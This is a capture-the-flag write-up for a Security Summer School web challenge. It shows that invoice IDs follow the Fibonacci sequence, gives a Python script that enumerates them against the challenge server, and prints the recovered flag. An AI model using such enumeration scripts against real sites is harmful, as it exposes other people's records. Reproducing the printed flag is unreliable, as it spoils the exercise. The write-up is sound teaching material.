Mind your own business

Security Summer School

Info	Details
Category	Web Exploitation
Difficulty	Easy

Challenge Overview

From the first time we enter the website we get a form.

form

After we complete it we're redirected to that invoice page, where I saw a weird thing here.

Fibonacci Sequence Pattern

This is the well-known "Fibonacci Sequence Pattern". It made me think about numbers, that thing with 1, 1, 2, 3, 5, 8, 13, where every adjacent two numbers sum up to get the next one.

I looked at the link and saw /invoice.php?invoice=1597 then checked 1597 and saw it's a Fibonacci number.

I made my life easier using curl in Kali, and when I entered a non-Fibonacci number I got Invoice not found.

So, we can only enter Fibonacci numbers, but there are infinite numbers like this. Since we know the flag format and that there are working links with ?invoice=*fibonacci_number*, we could try to bruteforce it in Python using the requests library.

I used the following Python Script to bruteforce the first 1000 invoices.

import requests

base_url = "http://141.85.224.70:8085/invoice.php?invoice="
flag_indicator = "SSS"

def generate_fibonacci(n_terms):
    a, b = 1, 1
    for _ in range(n_terms):
        yield a
        a, b = b, a + b

def brute_force_fibonacci(limit=1000):
    for fib_num in generate_fibonacci(limit):
        url = f"{base_url}{fib_num}"
        print(f"Trying invoice number: {fib_num}")
        try:
            response = requests.get(url)
            if flag_indicator in response.text:
                print(f"\n[!] Flag found at invoice number: {fib_num}")
                print("Response:\n", response.text)
                break
            else:
                print("No flag found.")
        except Exception as e:
            print(f"Error at invoice {fib_num}: {e}")

if __name__ == "__main__":
    brute_force_fibonacci(1000)

We found the flag at invoice 10946

invoice 10946

Final Flag

SSS{1ts_n0t_nic3_t0_sn00p_ar0und}

made by k0d